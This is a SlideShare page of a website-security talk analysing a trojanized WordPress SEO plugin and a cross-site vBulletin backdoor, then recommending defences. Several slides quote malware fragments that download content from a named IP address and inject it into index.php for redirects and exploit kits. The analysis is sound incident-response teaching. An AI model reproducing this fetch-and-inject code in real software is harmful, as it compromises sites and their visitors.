SlideShare a Scribd company logo

WordPress Security - Learning From Hacks

Download as PPTX, PDF
Tony Perez
Tony Perez
EducationTechnologyBusiness
1 of 37
WordPress Security Learning From Website Hacks
This is me! Sucuri Inc. Website Security o Incident Handling o Log Analysis o o Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Let’s Learn from Website Attacks Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Attack Scenerios o The Art of Phishing o Stealing Credit Cards Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Scenerio Uno (One) The art of Phishing Naive Users
Attack of Opportunity o Holiday season / Holiday spirit o Did you say Free? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Red Flag[s] <A href="http://www.[infecteddomain].com.au/wp -content/all-in-one-seopack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A> Red Alert: http://www.[infecteddomain].com.au Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Difference o o Pro Version? Legit Version? Modified file: aioseop_class.php Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Intent o Redirection - porn or exploit kits o Target: index.php o Taking content from here: $code_txt = 'http://91.239.15.61/o1.txt’; o Placing it in the files here: $index_path = $path.'/index.php'; if(file_put_contents($index_path, $code)){ Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
How? o Index.php payload: o Using curl to pull content from here: $url = http://91.239.15.61/java/google.php; Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Payload o Pulls content from: http://91.239.15.61/google.js - Redirection to Porn Sites http://91.239.15.61/g.php - Exploit Kits Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Lesson to Be Learned o Trust but verify sources o This is not isolated to just plugins, it can happen to themes as well o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant! o The vulnerability was the website administrator… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Scenerio Dos (Two) Got e-Commerce? Leverage 3rd-party CMS applications in your stack?
Got e-Commerce? o Business owners <3 E-commerce o CMS extensibility = WooCommerce o Quick setup of payment collection systems for goods o Awesome, right? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Big Target o Credit Card = Cha-Ching o Used/shared/sold underground o Impact is catastrophic o Blacklisting o Ban o No more cash flow! No more Trust! Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Cross-contamination Simple concept in which your website is attacked and infected by a neighboring site in the same environment Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
vBulletin o Popular CMS Application for Forums o WordPress + vBulletin Configurations Common Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Scenerio o WordPress: Main website | Blog | e-Commerce o vBulletin: Forum o 1 Server Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Payload Found here: /wp-admin/includes/list.php Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
How? o It’s about the journey folks… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Scenerio o list.php? o shop.txt? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
That’s Interesting /forum/ajax.php?edit= Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
vBulletin Plugin o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Dump of Users Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Attack Vector o Access Control Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Lessons to be Learned o Attackers are smart – surprise!!! o Cross-contamination is a real threat today! o Must be diligent across our stack! o Isolate applications if possible. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
What can you do? Lets get proactive!
Harsh Reality None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips.. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Two Important Vectors o Access control o Within your control… o Software vulnerabilities o Not so much… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Defense in Depth • There is no single cure • Layered Defenses • Combination of tools and actions – Combine: Protection and Detection Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Access Control o Google Authenticator – 2FA o http://wordpress.org/plugins/google-authenticator/ o Duo Security – 2FA o http://wordpress.org/plugins/duo-wordpress/ o Login Secure Solutions – Policy / Enforcement o http://wordpress.org/plugins/login-security-solution/ o Sucuri CloudProxy / Detection / Remedation - Complete Website Security o http://sucuri.net/signup Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Software Vulnerabilities o Trusted Sources o Start with the repo and established communities o If you’re not a developer this is going to be beyond your reach mostly o Web Application Firewall (WAF) Plugins o Highly ineffective, evading and bypassing is easy o Cause Denial of Service attacks o SaaS based Web Application Firewall (WAF) more effective! o Sucuri CloudProxy WAF Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Auditing • Know what is going on with your site – Integrity Checks – Logging in / Logging out – Changes being made • More important than half the hardening tips you read on line today • Options: – WP Security Audit log http://wordpress.org/plugins/wp-securityaudit-log/ – Sucuri Premium Plugin http://wordpress.sucuri.net Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
If all else fails… o Be sure you have backups… o VaultPress – WordPress Sites o Sucuri Backups – WordPress and Everything else o SaaS based Backups more effective! Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Tony Perez @perezbox | @sucuri_security tony@sucuri.net #wordsesh Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox

Recommended

WordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityWordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityTony Perez
 
Hacked - What do you do now?
Hacked - What do you do now?Hacked - What do you do now?
Hacked - What do you do now?Tony Perez
 
WordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureWordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureTony Perez
 
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTony Perez
 
Website Security - It Begins With Good Posture
Website Security - It Begins With Good PostureWebsite Security - It Begins With Good Posture
Website Security - It Begins With Good PostureTony Perez
 
Steps to Keep Your Site Clean
Steps to Keep Your Site CleanSteps to Keep Your Site Clean
Steps to Keep Your Site CleanSucuri
 
Navigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersNavigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersTony Perez
 
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit Guide
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit GuideSucuri Webinar: WAF (Firewall) and CDN Feature Benefit Guide
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit GuideSucuri
 

Recommended

WordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityWordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityTony Perez
 
Hacked - What do you do now?
Hacked - What do you do now?Hacked - What do you do now?
Hacked - What do you do now?Tony Perez
 
WordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureWordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureTony Perez
 
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTony Perez
 
Website Security - It Begins With Good Posture
Website Security - It Begins With Good PostureWebsite Security - It Begins With Good Posture
Website Security - It Begins With Good PostureTony Perez
 
Steps to Keep Your Site Clean
Steps to Keep Your Site CleanSteps to Keep Your Site Clean
Steps to Keep Your Site CleanSucuri
 
Navigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersNavigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersTony Perez
 
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit Guide
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit GuideSucuri Webinar: WAF (Firewall) and CDN Feature Benefit Guide
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit GuideSucuri
 
Kludges and PHP. Why Should You Use a WAF?
Kludges and PHP. Why Should You Use a WAF?Kludges and PHP. Why Should You Use a WAF?
Kludges and PHP. Why Should You Use a WAF?Sucuri
 
Sucuri Webinar: What is SEO Spam and How to Fight It
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri Webinar: What is SEO Spam and How to Fight It
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri
 
Sucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri
 
Sucuri Webinar: How Caching Options Can Impact Your Website Speed
Sucuri Webinar: How Caching Options Can Impact Your Website SpeedSucuri Webinar: How Caching Options Can Impact Your Website Speed
Sucuri Webinar: How Caching Options Can Impact Your Website SpeedSucuri
 
Sucuri Webinar: Website Security Primer for Digital Marketers
Sucuri Webinar: Website Security Primer for Digital MarketersSucuri Webinar: Website Security Primer for Digital Marketers
Sucuri Webinar: Website Security Primer for Digital MarketersSucuri
 
Sucuri Webinar: Leveraging Sucuri's API
Sucuri Webinar: Leveraging Sucuri's APISucuri Webinar: Leveraging Sucuri's API
Sucuri Webinar: Leveraging Sucuri's APISucuri
 
Sucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri
 
Sucuri Webinar: Hacked Website Trend Report Q1/2016
Sucuri Webinar: Hacked Website Trend Report Q1/2016Sucuri Webinar: Hacked Website Trend Report Q1/2016
Sucuri Webinar: Hacked Website Trend Report Q1/2016Sucuri
 
WCEU 2016 - 10 tips to sleep better at night
WCEU 2016 - 10 tips to sleep better at nightWCEU 2016 - 10 tips to sleep better at night
WCEU 2016 - 10 tips to sleep better at nightMaurizio Pelizzone
 
Sucuri Webinar: How to clean hacked WordPress sites
Sucuri Webinar: How to clean hacked WordPress sitesSucuri Webinar: How to clean hacked WordPress sites
Sucuri Webinar: How to clean hacked WordPress sitesSucuri
 
WordPress Hardening v4
WordPress Hardening v4WordPress Hardening v4
WordPress Hardening v4Maurizio Pelizzone
 
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri
 
Secure wordpress site
Secure wordpress siteSecure wordpress site
Secure wordpress sitefirojkhansahu
 
WPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteWPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteDeola Kayode
 
Why Do Hackers Hack?
Why Do Hackers Hack?Why Do Hackers Hack?
Why Do Hackers Hack?Sucuri
 
Webinar: Personal Online Privacy - Sucuri Security
Webinar: Personal Online Privacy - Sucuri SecurityWebinar: Personal Online Privacy - Sucuri Security
Webinar: Personal Online Privacy - Sucuri SecuritySucuri
 
What Are the Most Common Types of Hacks?
What Are the Most Common Types of Hacks?What Are the Most Common Types of Hacks?
What Are the Most Common Types of Hacks?Sucuri
 
WP Security - Master Class #SMWLagos2014
WP Security - Master Class #SMWLagos2014WP Security - Master Class #SMWLagos2014
WP Security - Master Class #SMWLagos2014sabinovates
 
Sucuri Webinar: Simple Steps To Secure Your Online Store
Sucuri Webinar: Simple Steps To Secure Your Online StoreSucuri Webinar: Simple Steps To Secure Your Online Store
Sucuri Webinar: Simple Steps To Secure Your Online StoreSucuri
 
Best Practices for Integrating Lync with Your Avaya Environment
Best Practices for Integrating Lync with Your Avaya EnvironmentBest Practices for Integrating Lync with Your Avaya Environment
Best Practices for Integrating Lync with Your Avaya EnvironmentPerficient, Inc.
 
Accelerate Sitecore DevOps on Microsoft Azure
Accelerate Sitecore DevOps on Microsoft AzureAccelerate Sitecore DevOps on Microsoft Azure
Accelerate Sitecore DevOps on Microsoft AzurePerficient, Inc.
 

More Related Content

What's hot

Kludges and PHP. Why Should You Use a WAF?
Kludges and PHP. Why Should You Use a WAF?Kludges and PHP. Why Should You Use a WAF?
Kludges and PHP. Why Should You Use a WAF?Sucuri
 
Sucuri Webinar: What is SEO Spam and How to Fight It
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri Webinar: What is SEO Spam and How to Fight It
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri
 
Sucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri
 
Sucuri Webinar: How Caching Options Can Impact Your Website Speed
Sucuri Webinar: How Caching Options Can Impact Your Website SpeedSucuri Webinar: How Caching Options Can Impact Your Website Speed
Sucuri Webinar: How Caching Options Can Impact Your Website SpeedSucuri
 
Sucuri Webinar: Website Security Primer for Digital Marketers
Sucuri Webinar: Website Security Primer for Digital MarketersSucuri Webinar: Website Security Primer for Digital Marketers
Sucuri Webinar: Website Security Primer for Digital MarketersSucuri
 
Sucuri Webinar: Leveraging Sucuri's API
Sucuri Webinar: Leveraging Sucuri's APISucuri Webinar: Leveraging Sucuri's API
Sucuri Webinar: Leveraging Sucuri's APISucuri
 
Sucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri
 
Sucuri Webinar: Hacked Website Trend Report Q1/2016
Sucuri Webinar: Hacked Website Trend Report Q1/2016Sucuri Webinar: Hacked Website Trend Report Q1/2016
Sucuri Webinar: Hacked Website Trend Report Q1/2016Sucuri
 
WCEU 2016 - 10 tips to sleep better at night
WCEU 2016 - 10 tips to sleep better at nightWCEU 2016 - 10 tips to sleep better at night
WCEU 2016 - 10 tips to sleep better at nightMaurizio Pelizzone
 
Sucuri Webinar: How to clean hacked WordPress sites
Sucuri Webinar: How to clean hacked WordPress sitesSucuri Webinar: How to clean hacked WordPress sites
Sucuri Webinar: How to clean hacked WordPress sitesSucuri
 
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri
 
Secure wordpress site
Secure wordpress siteSecure wordpress site
Secure wordpress sitefirojkhansahu
 
WPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteWPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteDeola Kayode
 
Why Do Hackers Hack?
Why Do Hackers Hack?Why Do Hackers Hack?
Why Do Hackers Hack?Sucuri
 
Webinar: Personal Online Privacy - Sucuri Security
Webinar: Personal Online Privacy - Sucuri SecurityWebinar: Personal Online Privacy - Sucuri Security
Webinar: Personal Online Privacy - Sucuri SecuritySucuri
 
What Are the Most Common Types of Hacks?
What Are the Most Common Types of Hacks?What Are the Most Common Types of Hacks?
What Are the Most Common Types of Hacks?Sucuri
 
WP Security - Master Class #SMWLagos2014
WP Security - Master Class #SMWLagos2014WP Security - Master Class #SMWLagos2014
WP Security - Master Class #SMWLagos2014sabinovates
 
Sucuri Webinar: Simple Steps To Secure Your Online Store
Sucuri Webinar: Simple Steps To Secure Your Online StoreSucuri Webinar: Simple Steps To Secure Your Online Store
Sucuri Webinar: Simple Steps To Secure Your Online StoreSucuri
 

What's hot (20)

Kludges and PHP. Why Should You Use a WAF?
Kludges and PHP. Why Should You Use a WAF?Kludges and PHP. Why Should You Use a WAF?
Kludges and PHP. Why Should You Use a WAF?
 
Sucuri Webinar: What is SEO Spam and How to Fight It
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri Webinar: What is SEO Spam and How to Fight It
Sucuri Webinar: What is SEO Spam and How to Fight It
 
Sucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get Hacked
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento Website
 
Sucuri Webinar: How Caching Options Can Impact Your Website Speed
Sucuri Webinar: How Caching Options Can Impact Your Website SpeedSucuri Webinar: How Caching Options Can Impact Your Website Speed
Sucuri Webinar: How Caching Options Can Impact Your Website Speed
 
Sucuri Webinar: Website Security Primer for Digital Marketers
Sucuri Webinar: Website Security Primer for Digital MarketersSucuri Webinar: Website Security Primer for Digital Marketers
Sucuri Webinar: Website Security Primer for Digital Marketers
 
Sucuri Webinar: Leveraging Sucuri's API
Sucuri Webinar: Leveraging Sucuri's APISucuri Webinar: Leveraging Sucuri's API
Sucuri Webinar: Leveraging Sucuri's API
 
Sucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! website
 
Sucuri Webinar: Hacked Website Trend Report Q1/2016
Sucuri Webinar: Hacked Website Trend Report Q1/2016Sucuri Webinar: Hacked Website Trend Report Q1/2016
Sucuri Webinar: Hacked Website Trend Report Q1/2016
 
WCEU 2016 - 10 tips to sleep better at night
WCEU 2016 - 10 tips to sleep better at nightWCEU 2016 - 10 tips to sleep better at night
WCEU 2016 - 10 tips to sleep better at night
 
Sucuri Webinar: How to clean hacked WordPress sites
Sucuri Webinar: How to clean hacked WordPress sitesSucuri Webinar: How to clean hacked WordPress sites
Sucuri Webinar: How to clean hacked WordPress sites
 
WordPress Hardening v4
WordPress Hardening v4WordPress Hardening v4
WordPress Hardening v4
 
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
 
Secure wordpress site
Secure wordpress siteSecure wordpress site
Secure wordpress site
 
WPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteWPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press website
 
Why Do Hackers Hack?
Why Do Hackers Hack?Why Do Hackers Hack?
Why Do Hackers Hack?
 
Webinar: Personal Online Privacy - Sucuri Security
Webinar: Personal Online Privacy - Sucuri SecurityWebinar: Personal Online Privacy - Sucuri Security
Webinar: Personal Online Privacy - Sucuri Security
 
What Are the Most Common Types of Hacks?
What Are the Most Common Types of Hacks?What Are the Most Common Types of Hacks?
What Are the Most Common Types of Hacks?
 
WP Security - Master Class #SMWLagos2014
WP Security - Master Class #SMWLagos2014WP Security - Master Class #SMWLagos2014
WP Security - Master Class #SMWLagos2014
 
Sucuri Webinar: Simple Steps To Secure Your Online Store
Sucuri Webinar: Simple Steps To Secure Your Online StoreSucuri Webinar: Simple Steps To Secure Your Online Store
Sucuri Webinar: Simple Steps To Secure Your Online Store
 

Viewers also liked

Best Practices for Integrating Lync with Your Avaya Environment
Best Practices for Integrating Lync with Your Avaya EnvironmentBest Practices for Integrating Lync with Your Avaya Environment
Best Practices for Integrating Lync with Your Avaya EnvironmentPerficient, Inc.
 
Accelerate Sitecore DevOps on Microsoft Azure
Accelerate Sitecore DevOps on Microsoft AzureAccelerate Sitecore DevOps on Microsoft Azure
Accelerate Sitecore DevOps on Microsoft AzurePerficient, Inc.
 
Avaya aura 6.x technical overview
Avaya aura 6.x technical overviewAvaya aura 6.x technical overview
Avaya aura 6.x technical overviewMotty Ben Atia
 
Microsoft azure platforms
Microsoft azure platformsMicrosoft azure platforms
Microsoft azure platformsMotty Ben Atia
 
Avaya One-X Mobile SIP for Apple iOS by PacketBase
Avaya One-X Mobile SIP for Apple iOS by PacketBaseAvaya One-X Mobile SIP for Apple iOS by PacketBase
Avaya One-X Mobile SIP for Apple iOS by PacketBasePacketBase, Inc.
 
Avaya VoIP on Cisco Best Practices by PacketBase
Avaya VoIP on Cisco Best Practices by PacketBaseAvaya VoIP on Cisco Best Practices by PacketBase
Avaya VoIP on Cisco Best Practices by PacketBasePacketBase, Inc.
 

Viewers also liked (6)

Best Practices for Integrating Lync with Your Avaya Environment
Best Practices for Integrating Lync with Your Avaya EnvironmentBest Practices for Integrating Lync with Your Avaya Environment
Best Practices for Integrating Lync with Your Avaya Environment
 
Accelerate Sitecore DevOps on Microsoft Azure
Accelerate Sitecore DevOps on Microsoft AzureAccelerate Sitecore DevOps on Microsoft Azure
Accelerate Sitecore DevOps on Microsoft Azure
 
Avaya aura 6.x technical overview
Avaya aura 6.x technical overviewAvaya aura 6.x technical overview
Avaya aura 6.x technical overview
 
Microsoft azure platforms
Microsoft azure platformsMicrosoft azure platforms
Microsoft azure platforms
 
Avaya One-X Mobile SIP for Apple iOS by PacketBase
Avaya One-X Mobile SIP for Apple iOS by PacketBaseAvaya One-X Mobile SIP for Apple iOS by PacketBase
Avaya One-X Mobile SIP for Apple iOS by PacketBase
 
Avaya VoIP on Cisco Best Practices by PacketBase
Avaya VoIP on Cisco Best Practices by PacketBaseAvaya VoIP on Cisco Best Practices by PacketBase
Avaya VoIP on Cisco Best Practices by PacketBase
 

Similar to WordPress Security - Learning From Hacks

How to Secure your WordPress Website - WordCamp UK 2014
How to Secure your WordPress Website - WordCamp UK 2014How to Secure your WordPress Website - WordCamp UK 2014
How to Secure your WordPress Website - WordCamp UK 2014Primary Image Ltd
 
Responsible [digital] Home Ownership
Responsible [digital] Home OwnershipResponsible [digital] Home Ownership
Responsible [digital] Home OwnershipDenise (Dee) Teal
 
Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...
Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...
Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...Benedek Menesi
 
You Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedYou Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedJoe McCray
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedfangjiafu
 
Comment pirater le site de mon concurrent.. et securiser le mien
Comment pirater le site de mon concurrent.. et securiser le mienComment pirater le site de mon concurrent.. et securiser le mien
Comment pirater le site de mon concurrent.. et securiser le mienJulien Dereumaux
 
Word press security 101
Word press security 101 Word press security 101
Word press security 101 Kojac801
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Shubham Gupta
 
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMERELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMECasey Ellis
 
IT Security - TestArmy
IT Security - TestArmy IT Security - TestArmy
IT Security - TestArmy TestArmy
 
Securing your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP MeetupSecuring your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP MeetupOyster Bay Marauders LLC
 
PHP SA 2013 - The weak points in our PHP projects
PHP SA 2013 - The weak points in our PHP projectsPHP SA 2013 - The weak points in our PHP projects
PHP SA 2013 - The weak points in our PHP projectsxsist10
 
So you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you howSo you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you howJoe McCray
 
Brighttalk learning to cook- network management recipes - final
Brighttalk learning to cook- network management recipes - finalBrighttalk learning to cook- network management recipes - final
Brighttalk learning to cook- network management recipes - finalAndrew White
 

Similar to WordPress Security - Learning From Hacks (20)

How to Secure your WordPress Website - WordCamp UK 2014
How to Secure your WordPress Website - WordCamp UK 2014How to Secure your WordPress Website - WordCamp UK 2014
How to Secure your WordPress Website - WordCamp UK 2014
 
Pubcon Vegas Session - WordPress Site Security Audits
Pubcon Vegas Session - WordPress Site Security AuditsPubcon Vegas Session - WordPress Site Security Audits
Pubcon Vegas Session - WordPress Site Security Audits
 
Responsible [digital] Home Ownership
Responsible [digital] Home OwnershipResponsible [digital] Home Ownership
Responsible [digital] Home Ownership
 
Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...
Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...
Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...
 
You Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedYou Spent All That Money And Still Got Owned
You Spent All That Money And Still Got Owned
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
Comment pirater le site de mon concurrent.. et securiser le mien
Comment pirater le site de mon concurrent.. et securiser le mienComment pirater le site de mon concurrent.. et securiser le mien
Comment pirater le site de mon concurrent.. et securiser le mien
 
Word press security 101
Word press security 101 Word press security 101
Word press security 101
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
 
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMERELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
 
IT Security - TestArmy
IT Security - TestArmy IT Security - TestArmy
IT Security - TestArmy
 
Cyber Security for Financial Institutions
Cyber Security for Financial InstitutionsCyber Security for Financial Institutions
Cyber Security for Financial Institutions
 
Which plugins rule the world?
Which plugins rule the world? Which plugins rule the world?
Which plugins rule the world?
 
WordPress security
WordPress securityWordPress security
WordPress security
 
Securing your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP MeetupSecuring your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP Meetup
 
PHP SA 2013 - The weak points in our PHP projects
PHP SA 2013 - The weak points in our PHP projectsPHP SA 2013 - The weak points in our PHP projects
PHP SA 2013 - The weak points in our PHP projects
 
So you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you howSo you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you how
 
Protect your website
Protect your websiteProtect your website
Protect your website
 
Brighttalk learning to cook- network management recipes - final
Brighttalk learning to cook- network management recipes - finalBrighttalk learning to cook- network management recipes - final
Brighttalk learning to cook- network management recipes - final
 

More from Tony Perez

A Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersA Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersTony Perez
 
2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and SecurityTony Perez
 
Accounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationAccounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationTony Perez
 
Building a Security Framework for Websites
Building a Security Framework for WebsitesBuilding a Security Framework for Websites
Building a Security Framework for WebsitesTony Perez
 
Business of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceBusiness of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceTony Perez
 
Website Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsWebsite Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsTony Perez
 
Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)Tony Perez
 
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri SecurityWordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri SecurityTony Perez
 
Joomla! Day Atlanta 2014 - Website Security - The Basics
